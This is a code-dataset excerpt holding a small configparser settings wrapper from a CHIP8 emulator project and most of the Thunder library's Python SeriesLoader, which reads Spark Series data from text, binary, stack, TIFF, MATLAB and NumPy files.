c7d594ecefc0ecfe585fc9557bf2ed8617f874e6 | 1,944 | py | Python | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
] | 4 | 2015-12-22T15:03:43.000Z | 2016-07-28T08:11:48.000Z | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
] | null | null | null | settings.py | SalinderSidhu/CHIP8 | 46a01aa7675805b84809d1e9762905de8fdccc66 | [
"MIT"
] | null | null | null | import configparser
class Settings:
    '''The Settings class is a wrapper around configparser and its functions.
This class simplifies the tasks of loading, storing and manipulating
settings data.'''
def __init__(self, filename):
'''Create a new Settings object with a specific file name.'''
# Exceptions
self.__settingException = Exception(
'Cannot find specified setting data!')
# Settings variables
self.__filename = filename
self.__config = configparser.ConfigParser()
# Load settings from existing file (if one exists)
self.__isEmpty = len(self.__config.read(self.__filename)) == 0
def isEmpty(self):
        '''Return True if there is no settings data loaded, otherwise return
False.'''
return self.__isEmpty
def addNewSetting(self, category, settingDict):
'''Add a new setting with the specified category and data. Save the new
settings data to a file.'''
self.__config[category] = settingDict.copy()
self.__saveAllSettings()
self.__isEmpty = False
def getSetting(self, category, key):
'''Return a setting value from the specified category and setting
key.'''
try:
return self.__config.get(category, key)
except KeyError:
raise self.__settingException
def editSetting(self, category, key, value):
'''Change an existing setting with a specified category and setting key
to the value specified. Save the new settings data to a file.'''
try:
self.__config.set(category, key, str(value))
self.__saveAllSettings()
except KeyError:
raise self.__settingException
def __saveAllSettings(self):
'''Write the current settings data to a file.'''
with open(self.__filename, 'w') as configFile:
self.__config.write(configFile)
| 36.679245 | 79 | 0.646091 | 222 | 1,944 | 5.477477 | 0.382883 | 0.049342 | 0.049342 | 0.037007 | 0.181743 | 0.116776 | 0.047697 | 0.047697 | 0 | 0 | 0 | 0.000707 | 0.272634 | 1,944 | 52 | 80 | 37.384615 | 0.859265 | 0.359054 | 0 | 0.285714 | 0 | 0 | 0.030822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.035714 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7dcc75b55961bd952da5e374d98d1ab7d3f5c96 | 40,969 | py | Python | python/thunder/rdds/fileio/seriesloader.py | broxtronix/thunder | 4dad77721e2c9e225f94a6a5366d51ec83ac4690 | [
"Apache-2.0"
] | null | null | null | python/thunder/rdds/fileio/seriesloader.py | broxtronix/thunder | 4dad77721e2c9e225f94a6a5366d51ec83ac4690 | [
"Apache-2.0"
] | null | null | null | python/thunder/rdds/fileio/seriesloader.py | broxtronix/thunder | 4dad77721e2c9e225f94a6a5366d51ec83ac4690 | [
"Apache-2.0"
] | null | null | null | """Provides SeriesLoader object and helpers, used to read Series data from disk or other filesystems.
"""
from collections import namedtuple
import json
from numpy import array, arange, frombuffer, load, ndarray, unravel_index, vstack
from numpy import dtype as dtypeFunc
from scipy.io import loadmat
from cStringIO import StringIO
import itertools
import struct
import urlparse
import math
from thunder.rdds.fileio.writers import getParallelWriterForPath
from thunder.rdds.keys import Dimensions
from thunder.rdds.fileio.readers import getFileReaderForPath, FileNotFoundError, appendExtensionToPathSpec
from thunder.rdds.imgblocks.blocks import SimpleBlocks
from thunder.rdds.series import Series
from thunder.utils.common import parseMemoryString, smallestFloatType
class SeriesLoader(object):
"""Loader object used to instantiate Series data stored in a variety of formats.
"""
def __init__(self, sparkContext, minPartitions=None):
"""Initialize a new SeriesLoader object.
Parameters
----------
sparkcontext: SparkContext
The pyspark SparkContext object used by the current Thunder environment.
minPartitions: int
minimum number of partitions to use when loading data. (Used by fromText, fromMatLocal, and fromNpyLocal)
"""
from thunder.utils.aws import AWSCredentials
self.sc = sparkContext
self.minPartitions = minPartitions
self.awsCredentialsOverride = AWSCredentials.fromContext(sparkContext)
def _checkOverwrite(self, outputDirPath):
from thunder.utils.common import raiseErrorIfPathExists
raiseErrorIfPathExists(outputDirPath, awsCredentialsOverride=self.awsCredentialsOverride)
def fromArrays(self, arrays, npartitions=None):
"""
Create a Series object from a sequence of 1d numpy arrays on the driver.
"""
# recast singleton
if isinstance(arrays, ndarray):
arrays = [arrays]
# check shape and dtype
shape = arrays[0].shape
dtype = arrays[0].dtype
for ary in arrays:
if not ary.shape == shape:
raise ValueError("Inconsistent array shapes: first array had shape %s, but other array has shape %s" %
(str(shape), str(ary.shape)))
if not ary.dtype == dtype:
raise ValueError("Inconsistent array dtypes: first array had dtype %s, but other array has dtype %s" %
(str(dtype), str(ary.dtype)))
# generate linear keys
keys = map(lambda k: (k,), xrange(0, len(arrays)))
return Series(self.sc.parallelize(zip(keys, arrays), npartitions), dtype=str(dtype))
def fromArraysAsImages(self, arrays):
"""Create a Series object from a sequence of numpy ndarrays resident in memory on the driver.
The arrays will be interpreted as though each represents a single time point - effectively the same
as if converting Images to a Series, with each array representing a volume image at a particular
point in time. Thus in the resulting Series, the value of the record with key (0,0,0) will be
    array([arrays[0][0,0,0], arrays[1][0,0,0], ..., arrays[n][0,0,0]]).
The dimensions of the resulting Series will be *opposite* that of the passed numpy array. Their dtype will not
be changed.
"""
# if passed a single array, cast it to a sequence of length 1
if isinstance(arrays, ndarray):
arrays = [arrays]
# check that shapes of passed arrays are consistent
shape = arrays[0].shape
dtype = arrays[0].dtype
for ary in arrays:
if not ary.shape == shape:
raise ValueError("Inconsistent array shapes: first array had shape %s, but other array has shape %s" %
(str(shape), str(ary.shape)))
if not ary.dtype == dtype:
raise ValueError("Inconsistent array dtypes: first array had dtype %s, but other array has dtype %s" %
(str(dtype), str(ary.dtype)))
# get indices so that fastest index changes first
shapeiters = (xrange(n) for n in shape)
keys = [idx[::-1] for idx in itertools.product(*shapeiters)]
values = vstack([ary.ravel() for ary in arrays]).T
dims = Dimensions.fromTuple(shape[::-1])
return Series(self.sc.parallelize(zip(keys, values), self.minPartitions), dims=dims, dtype=str(dtype))
@staticmethod
def __normalizeDatafilePattern(dataPath, ext):
dataPath = appendExtensionToPathSpec(dataPath, ext)
# we do need to prepend a scheme here, b/c otherwise the Hadoop based readers
# will adopt their default behavior and start looking on hdfs://.
parseResult = urlparse.urlparse(dataPath)
if parseResult.scheme:
# this appears to already be a fully-qualified URI
return dataPath
else:
# this looks like a local path spec
# check whether we look like an absolute or a relative path
import os
dirComponent, fileComponent = os.path.split(dataPath)
if not os.path.isabs(dirComponent):
# need to make relative local paths absolute; our file scheme parsing isn't all that it could be.
dirComponent = os.path.abspath(dirComponent)
dataPath = os.path.join(dirComponent, fileComponent)
return "file://" + dataPath
def fromText(self, dataPath, nkeys=None, ext="txt", dtype='float64'):
"""
Loads Series data from text files.
Parameters
----------
dataPath : string
Specifies the file or files to be loaded. dataPath may be either a URI (with scheme specified) or a path
on the local filesystem.
If a path is passed (determined by the absence of a scheme component when attempting to parse as a URI),
and it is not already a wildcard expression and does not end in <ext>, then it will be converted into a
wildcard pattern by appending '/*.ext'. This conversion can be avoided by passing a "file://" URI.
dtype: dtype or dtype specifier, default 'float64'
"""
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
def parse(line, nkeys_):
vec = [float(x) for x in line.split(' ')]
ts = array(vec[nkeys_:], dtype=dtype)
keys = tuple(int(x) for x in vec[:nkeys_])
return keys, ts
lines = self.sc.textFile(dataPath, self.minPartitions)
data = lines.map(lambda x: parse(x, nkeys))
return Series(data, dtype=str(dtype))
# keytype, valuetype here violate camelCasing convention for consistence with JSON conf file format
BinaryLoadParameters = namedtuple('BinaryLoadParameters', 'nkeys nvalues keytype valuetype')
BinaryLoadParameters.__new__.__defaults__ = (None, None, 'int16', 'int16')
def __loadParametersAndDefaults(self, dataPath, confFilename, nkeys, nvalues, keyType, valueType):
"""Collects parameters to use for binary series loading.
Priority order is as follows:
1. parameters specified as keyword arguments;
2. parameters specified in a conf.json file on the local filesystem;
3. default parameters
Returns
-------
BinaryLoadParameters instance
"""
params = self.loadConf(dataPath, confFilename=confFilename)
# filter dict to include only recognized field names:
for k in params.keys():
if k not in SeriesLoader.BinaryLoadParameters._fields:
del params[k]
keywordParams = {'nkeys': nkeys, 'nvalues': nvalues, 'keytype': keyType, 'valuetype': valueType}
for k, v in keywordParams.items():
if not v:
del keywordParams[k]
params.update(keywordParams)
return SeriesLoader.BinaryLoadParameters(**params)
@staticmethod
def __checkBinaryParametersAreSpecified(paramsObj):
"""Throws ValueError if any of the field values in the passed namedtuple instance evaluate to False.
Note this is okay only so long as zero is not a valid parameter value. Hmm.
"""
missing = []
for paramName, paramVal in paramsObj._asdict().iteritems():
if not paramVal:
missing.append(paramName)
if missing:
raise ValueError("Missing parameters to load binary series files - " +
"these must be given either as arguments or in a configuration file: " +
str(tuple(missing)))
def fromBinary(self, dataPath, ext='bin', confFilename='conf.json',
nkeys=None, nvalues=None, keyType=None, valueType=None,
newDtype='smallfloat', casting='safe', maxPartitionSize='32mb'):
"""
Load a Series object from a directory of binary files.
Parameters
----------
dataPath : string URI or local filesystem path
Specifies the directory or files to be loaded. May be formatted as a URI string with scheme (e.g. "file://",
"s3n://", or "gs://"). If no scheme is present, will be interpreted as a path on the local filesystem. This path
must be valid on all workers. Datafile may also refer to a single file, or to a range of files specified
by a glob-style expression using a single wildcard character '*'.
newDtype : dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Most methods expect Series data to be floating-point. Input data will be
cast to the requested `newdtype` if not None - see Data `astype()` method.
casting : 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
maxPartitionSize : str, optional, default = '32mb'
Maximum size of partitions as Java-style memory, will indirectly control the number of partitions
"""
paramsObj = self.__loadParametersAndDefaults(dataPath, confFilename, nkeys, nvalues, keyType, valueType)
self.__checkBinaryParametersAreSpecified(paramsObj)
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
keyDtype = dtypeFunc(paramsObj.keytype)
valDtype = dtypeFunc(paramsObj.valuetype)
keySize = paramsObj.nkeys * keyDtype.itemsize
recordSize = keySize + paramsObj.nvalues * valDtype.itemsize
from thunder.utils.common import parseMemoryString
if isinstance(maxPartitionSize, basestring):
size = parseMemoryString(maxPartitionSize)
else:
raise Exception("Invalid size specification")
hadoopConf = {'recordLength': str(recordSize), 'mapred.max.split.size': str(size)}
lines = self.sc.newAPIHadoopFile(dataPath, 'thunder.util.io.hadoop.FixedLengthBinaryInputFormat',
'org.apache.hadoop.io.LongWritable',
'org.apache.hadoop.io.BytesWritable',
conf=hadoopConf)
data = lines.map(lambda (_, v):
(tuple(int(x) for x in frombuffer(buffer(v, 0, keySize), dtype=keyDtype)),
frombuffer(buffer(v, keySize), dtype=valDtype)))
return Series(data, dtype=str(valDtype), index=arange(paramsObj.nvalues)).astype(newDtype, casting)
def _getSeriesBlocksFromStack(self, dataPath, dims, ext="stack", blockSize="150M", dtype='int16',
newDtype='smallfloat', casting='safe', startIdx=None, stopIdx=None, recursive=False):
"""Create an RDD of <string blocklabel, (int k-tuple indices, array of datatype values)>
Parameters
----------
dataPath: string URI or local filesystem path
Specifies the directory or files to be loaded. May be formatted as a URI string with scheme (e.g. "file://",
"s3n://" or "gs://"). If no scheme is present, will be interpreted as a path on the local filesystem. This path
must be valid on all workers. Datafile may also refer to a single file, or to a range of files specified
by a glob-style expression using a single wildcard character '*'.
dims: tuple of positive int
Dimensions of input image data, ordered with the fastest-changing dimension first.
dtype: dtype or dtype specifier, optional, default 'int16'
Numpy dtype of input stack data
newDtype: floating-point dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Series data must be floating-point. Input data will be cast to the
requested `newdtype` - see numpy `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
recursive: boolean, default False
If true, will recursively descend directories rooted at dataPath, loading all files in the tree that
have an extension matching 'ext'. Recursive loading is currently only implemented for local filesystems
(not s3).
Returns
---------
pair of (RDD, ntimepoints)
RDD: sequence of keys, values pairs
(call using flatMap)
RDD Key: tuple of int
            zero-based indices of position within original image volume
RDD Value: numpy array of datatype
series of values at position across loaded image volumes
ntimepoints: int
number of time points in returned series, determined from number of stack files found at dataPath
newDtype: string
string representation of numpy data type of returned blocks
"""
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
blockSize = parseMemoryString(blockSize)
totalDim = reduce(lambda x_, y_: x_*y_, dims)
dtype = dtypeFunc(dtype)
if newDtype is None or newDtype == '':
newDtype = str(dtype)
elif newDtype == 'smallfloat':
newDtype = str(smallestFloatType(dtype))
else:
newDtype = str(newDtype)
reader = getFileReaderForPath(dataPath)(awsCredentialsOverride=self.awsCredentialsOverride)
filenames = reader.list(dataPath, startIdx=startIdx, stopIdx=stopIdx, recursive=recursive)
if not filenames:
raise IOError("No files found for path '%s'" % dataPath)
dataSize = totalDim * len(filenames) * dtype.itemsize
nblocks = max(dataSize / blockSize, 1) # integer division
if len(dims) >= 3:
# for 3D stacks, do calculations to ensure that
# different planes appear in distinct files
blocksPerPlane = max(nblocks / dims[-1], 1)
pixPerPlane = reduce(lambda x_, y_: x_*y_, dims[:-1]) # all but last dimension
# get the greatest number of blocks in a plane (up to as many as requested) that still divide the plane
# evenly. This will always be at least one.
kUpdated = [x for x in range(1, blocksPerPlane+1) if not pixPerPlane % x][-1]
nblocks = kUpdated * dims[-1]
blockSizePerStack = (totalDim / nblocks) * dtype.itemsize
else:
# otherwise just round to make contents divide into nearly even blocks
blockSizePerStack = int(math.ceil(totalDim / float(nblocks)))
nblocks = int(math.ceil(totalDim / float(blockSizePerStack)))
blockSizePerStack *= dtype.itemsize
fileSize = totalDim * dtype.itemsize
def readBlock(blockNum):
# copy size out from closure; will modify later:
blockSizePerStack_ = blockSizePerStack
# get start position for this block
position = blockNum * blockSizePerStack_
# adjust if at end of file
if (position + blockSizePerStack_) > fileSize:
blockSizePerStack_ = int(fileSize - position)
# loop over files, loading one block from each
bufs = []
for fname in filenames:
buf = reader.read(fname, startOffset=position, size=blockSizePerStack_)
bufs.append(frombuffer(buf, dtype=dtype))
buf = vstack(bufs).T # dimensions are now linindex x time (images)
del bufs
buf = buf.astype(newDtype, casting=casting, copy=False)
# append subscript keys based on dimensions
itemPosition = position / dtype.itemsize
itemBlocksize = blockSizePerStack_ / dtype.itemsize
linearIdx = arange(itemPosition, itemPosition + itemBlocksize) # zero-based
keys = zip(*map(tuple, unravel_index(linearIdx, dims, order='F')))
return zip(keys, buf)
# map over blocks
return (self.sc.parallelize(range(0, nblocks), nblocks).flatMap(lambda bn: readBlock(bn)),
len(filenames), newDtype)
@staticmethod
def __readMetadataFromFirstPageOfMultiTif(reader, filePath):
import thunder.rdds.fileio.multitif as multitif
# read first page of first file to get expected image size
tiffFP = reader.open(filePath)
tiffParser = multitif.TiffParser(tiffFP, debug=False)
tiffHeaders = multitif.TiffData()
tiffParser.parseFileHeader(destinationTiff=tiffHeaders)
firstIfd = tiffParser.parseNextImageFileDirectory(destinationTiff=tiffHeaders)
if not firstIfd.isLuminanceImage():
raise ValueError(("File %s does not appear to be a luminance " % filePath) +
"(greyscale or bilevel) TIF image, " +
"which are the only types currently supported")
# keep reading pages until we reach the end of the file, in order to get number of planes:
while tiffParser.parseNextImageFileDirectory(destinationTiff=tiffHeaders):
pass
# get dimensions
npages = len(tiffHeaders.ifds)
height = firstIfd.getImageHeight()
width = firstIfd.getImageWidth()
# get datatype
bitsPerSample = firstIfd.getBitsPerSample()
if not (bitsPerSample in (8, 16, 32, 64)):
raise ValueError("Only 8, 16, 32, or 64 bit per pixel TIF images are supported, got %d" % bitsPerSample)
sampleFormat = firstIfd.getSampleFormat()
if sampleFormat == multitif.SAMPLE_FORMAT_UINT:
dtStr = 'uint'
elif sampleFormat == multitif.SAMPLE_FORMAT_INT:
dtStr = 'int'
elif sampleFormat == multitif.SAMPLE_FORMAT_FLOAT:
dtStr = 'float'
else:
raise ValueError("Unknown TIF SampleFormat tag value %d, should be 1, 2, or 3 for uint, int, or float"
% sampleFormat)
dtype = dtStr+str(bitsPerSample)
return height, width, npages, dtype
def _getSeriesBlocksFromMultiTif(self, dataPath, ext="tif", blockSize="150M",
newDtype='smallfloat', casting='safe', startIdx=None, stopIdx=None,
recursive=False):
import thunder.rdds.fileio.multitif as multitif
import itertools
from PIL import Image
import io
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
blockSize = parseMemoryString(blockSize)
reader = getFileReaderForPath(dataPath)(awsCredentialsOverride=self.awsCredentialsOverride)
filenames = reader.list(dataPath, startIdx=startIdx, stopIdx=stopIdx, recursive=recursive)
if not filenames:
raise IOError("No files found for path '%s'" % dataPath)
ntimepoints = len(filenames)
doMinimizeReads = dataPath.lower().startswith("s3") or dataPath.lower().startswith("gs")
# check PIL version to see whether it is actually pillow or indeed old PIL and choose
# conversion function appropriately. See ImagesLoader.fromMultipageTif and common.pil_to_array
# for more explanation.
isPillow = hasattr(Image, "PILLOW_VERSION")
if isPillow:
conversionFcn = array # use numpy's array() function
else:
from thunder.utils.common import pil_to_array
conversionFcn = pil_to_array # use our modified version of matplotlib's pil_to_array
height, width, npages, dtype = SeriesLoader.__readMetadataFromFirstPageOfMultiTif(reader, filenames[0])
if dtype.startswith('int'):
raise ValueError('Signed integer tiff images are not supported in SeriesLoader (shuffle=False);' +
' please try loading as Images (shuffle=True)')
pixelBytesize = dtypeFunc(dtype).itemsize
if newDtype is None or str(newDtype) == '':
newDtype = str(dtype)
elif newDtype == 'smallfloat':
newDtype = str(smallestFloatType(dtype))
else:
newDtype = str(newDtype)
        # initialize at one block per plane
bytesPerPlane = height * width * pixelBytesize * ntimepoints
bytesPerBlock = bytesPerPlane
blocksPerPlane = 1
# keep dividing while cutting our size in half still leaves us bigger than the requested size
# should end up no more than 2x blockSize.
while bytesPerBlock >= blockSize * 2:
bytesPerBlock /= 2
blocksPerPlane *= 2
blocklenPixels = max((height * width) / blocksPerPlane, 1) # integer division
while blocksPerPlane * blocklenPixels < height * width: # make sure we're reading the plane fully
blocksPerPlane += 1
# prevent bringing in self in closure:
awsCredentialsOverride = self.awsCredentialsOverride
# keys will be planeidx, blockidx:
keys = list(itertools.product(xrange(npages), xrange(blocksPerPlane)))
def readBlockFromTiff(planeIdxBlockIdx):
planeIdx, blockIdx = planeIdxBlockIdx
blocks = []
planeShape = None
blockStart = None
blockEnd = None
for fname in filenames:
reader_ = getFileReaderForPath(fname)(awsCredentialsOverride=awsCredentialsOverride)
fp = reader_.open(fname)
try:
if doMinimizeReads:
# use multitif module to generate a fake, in-memory
# one-page tif file. the advantage of this is that it
# cuts way down on the many small reads that PIL/pillow
# will make otherwise, which would be a problem for s3
# or Google Storage
tiffParser_ = multitif.TiffParser(fp, debug=False)
tiffFilebuffer = multitif.packSinglePage(tiffParser_, pageIdx=planeIdx)
byteBuf = io.BytesIO(tiffFilebuffer)
try:
pilImg = Image.open(byteBuf)
ary = conversionFcn(pilImg).T
finally:
byteBuf.close()
del tiffFilebuffer, tiffParser_, pilImg, byteBuf
else:
# read tif using PIL directly
pilImg = Image.open(fp)
pilImg.seek(planeIdx)
ary = conversionFcn(pilImg).T
del pilImg
if not planeShape:
planeShape = ary.shape[:]
blockStart = blockIdx * blocklenPixels
blockEnd = min(blockStart+blocklenPixels, planeShape[0]*planeShape[1])
blocks.append(ary.ravel(order='C')[blockStart:blockEnd])
del ary
finally:
fp.close()
buf = vstack(blocks).T # dimensions are now linindex x time (images)
del blocks
buf = buf.astype(newDtype, casting=casting, copy=False)
# append subscript keys based on dimensions
linearIdx = arange(blockStart, blockEnd) # zero-based
seriesKeys = zip(*map(tuple, unravel_index(linearIdx, planeShape, order='C')))
# add plane index to end of keys
if npages > 1:
seriesKeys = [tuple(list(keys_)[::-1]+[planeIdx]) for keys_ in seriesKeys]
else:
seriesKeys = [tuple(list(keys_)[::-1]) for keys_ in seriesKeys]
return zip(seriesKeys, buf)
# map over blocks
rdd = self.sc.parallelize(keys, len(keys)).flatMap(readBlockFromTiff)
if npages > 1:
dims = (npages, width, height)
else:
dims = (width, height)
metadata = (dims, ntimepoints, newDtype)
return rdd, metadata
def fromStack(self, dataPath, dims, ext="stack", blockSize="150M", dtype='int16',
newDtype='smallfloat', casting='safe', startIdx=None, stopIdx=None, recursive=False):
"""Load a Series object directly from binary image stack files.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
dims: tuple of positive int
Dimensions of input image data, ordered with the fastest-changing dimension first.
ext: string, optional, default "stack"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
dtype: dtype or dtype specifier, optional, default 'int16'
Numpy dtype of input stack data
newDtype: dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Most methods expect Series data to be floating-point. Input data will be
cast to the requested `newdtype` if not None - see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
recursive: boolean, default False
If true, will recursively descend directories rooted at dataPath, loading all files in the tree that
have an extension matching 'ext'. Recursive loading is currently only implemented for local filesystems
(not s3).
"""
seriesBlocks, npointsInSeries, newDtype = \
self._getSeriesBlocksFromStack(dataPath, dims, ext=ext, blockSize=blockSize, dtype=dtype,
newDtype=newDtype, casting=casting, startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
return Series(seriesBlocks, dims=dims, dtype=newDtype, index=arange(npointsInSeries))
def fromTif(self, dataPath, ext="tif", blockSize="150M", newDtype='smallfloat', casting='safe',
startIdx=None, stopIdx=None, recursive=False):
"""Load a Series object from multipage tiff files.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
ext: string, optional, default "tif"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
newDtype: dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Most methods expect Series data to be floating-point. Input data will be
cast to the requested `newdtype` if not None - see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
recursive: boolean, default False
If true, will recursively descend directories rooted at dataPath, loading all files in the tree that
have an extension matching 'ext'. Recursive loading is currently only implemented for local filesystems
(not s3).
"""
seriesBlocks, metadata = self._getSeriesBlocksFromMultiTif(dataPath, ext=ext, blockSize=blockSize,
newDtype=newDtype, casting=casting,
startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
dims, npointsInSeries, dtype = metadata
return Series(seriesBlocks, dims=Dimensions.fromTuple(dims[::-1]), dtype=dtype,
index=arange(npointsInSeries))
def __saveSeriesRdd(self, seriesBlocks, outputDirPath, dims, npointsInSeries, dtype, overwrite=False):
if not overwrite:
self._checkOverwrite(outputDirPath)
overwrite = True # prevent additional downstream checks for this path
writer = getParallelWriterForPath(outputDirPath)(outputDirPath, overwrite=overwrite,
awsCredentialsOverride=self.awsCredentialsOverride)
def blockToBinarySeries(kvIter):
label = None
keyPacker = None
buf = StringIO()
for seriesKey, series in kvIter:
if keyPacker is None:
keyPacker = struct.Struct('h'*len(seriesKey))
label = SimpleBlocks.getBinarySeriesNameForKey(seriesKey) + ".bin"
buf.write(keyPacker.pack(*seriesKey))
buf.write(series.tostring())
val = buf.getvalue()
buf.close()
return [(label, val)]
seriesBlocks.mapPartitions(blockToBinarySeries).foreach(writer.writerFcn)
writeSeriesConfig(outputDirPath, len(dims), npointsInSeries, valueType=dtype, overwrite=overwrite,
awsCredentialsOverride=self.awsCredentialsOverride)
def saveFromStack(self, dataPath, outputDirPath, dims, ext="stack", blockSize="150M", dtype='int16',
newDtype=None, casting='safe', startIdx=None, stopIdx=None, overwrite=False, recursive=False):
"""Write out data from binary image stack files in the Series data flat binary format.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
outputDirPath: string
Path to a directory into which to write Series file output. An outputdir argument may be either a path
on the local file system or a URI-like format, as in dataPath.
dims: tuple of positive int
Dimensions of input image data, ordered with the fastest-changing dimension first.
ext: string, optional, default "stack"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
dtype: dtype or dtype specifier, optional, default 'int16'
Numpy dtype of input stack data
newDtype: floating-point dtype or dtype specifier or string 'smallfloat' or None, optional, default None
Numpy dtype of output series binary data. Input data will be cast to the requested `newdtype` if not None
- see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
overwrite: boolean, optional, default False
If true, the directory specified by outputdirpath will first be deleted, along with all its contents, if it
already exists. If false, a ValueError will be thrown if outputdirpath is found to already exist.
"""
if not overwrite:
self._checkOverwrite(outputDirPath)
overwrite = True # prevent additional downstream checks for this path
seriesBlocks, npointsInSeries, newDtype = \
self._getSeriesBlocksFromStack(dataPath, dims, ext=ext, blockSize=blockSize, dtype=dtype,
newDtype=newDtype, casting=casting, startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
self.__saveSeriesRdd(seriesBlocks, outputDirPath, dims, npointsInSeries, newDtype, overwrite=overwrite)
def saveFromTif(self, dataPath, outputDirPath, ext="tif", blockSize="150M",
newDtype=None, casting='safe', startIdx=None, stopIdx=None,
overwrite=False, recursive=False):
"""Write out data from multipage tif files in the Series data flat binary format.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
        outputDirPath: string
Path to a directory into which to write Series file output. An outputdir argument may be either a path
on the local file system or a URI-like format, as in dataPath.
ext: string, optional, default "stack"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
newDtype: floating-point dtype or dtype specifier or string 'smallfloat' or None, optional, default None
Numpy dtype of output series binary data. Input data will be cast to the requested `newdtype` if not None
- see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
overwrite: boolean, optional, default False
If true, the directory specified by outputdirpath will first be deleted, along with all its contents, if it
already exists. If false, a ValueError will be thrown if outputdirpath is found to already exist.
"""
if not overwrite:
self._checkOverwrite(outputDirPath)
overwrite = True # prevent additional downstream checks for this path
seriesBlocks, metadata = self._getSeriesBlocksFromMultiTif(dataPath, ext=ext, blockSize=blockSize,
newDtype=newDtype, casting=casting,
startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
dims, npointsInSeries, dtype = metadata
self.__saveSeriesRdd(seriesBlocks, outputDirPath, dims, npointsInSeries, dtype, overwrite=overwrite)
def fromMatLocal(self, dataPath, varName, keyFile=None):
"""Loads Series data stored in a Matlab .mat file.
`datafile` must refer to a path visible to all workers, such as on NFS or similar mounted shared filesystem.
"""
data = loadmat(dataPath)[varName]
if data.ndim > 2:
raise IOError('Input data must be one or two dimensional')
if keyFile:
keys = map(lambda x: tuple(x), loadmat(keyFile)['keys'])
else:
keys = arange(0, data.shape[0])
rdd = Series(self.sc.parallelize(zip(keys, data), self.minPartitions), dtype=str(data.dtype))
return rdd
def fromNpyLocal(self, dataPath, keyFile=None):
"""Loads Series data stored in the numpy save() .npy format.
`datafile` must refer to a path visible to all workers, such as on NFS or similar mounted shared filesystem.
"""
data = load(dataPath)
if data.ndim > 2:
raise IOError('Input data must be one or two dimensional')
if keyFile:
keys = map(lambda x: tuple(x), load(keyFile))
else:
keys = arange(0, data.shape[0])
rdd = Series(self.sc.parallelize(zip(keys, data), self.minPartitions), dtype=str(data.dtype))
return rdd
def loadConf(self, dataPath, confFilename='conf.json'):
"""Returns a dict loaded from a json file.
Looks for file named `conffile` in same directory as `dataPath`
Returns {} if file not found
"""
if not confFilename:
return {}
reader = getFileReaderForPath(dataPath)(awsCredentialsOverride=self.awsCredentialsOverride)
try:
jsonBuf = reader.read(dataPath, filename=confFilename)
except FileNotFoundError:
return {}
params = json.loads(jsonBuf)
if 'format' in params:
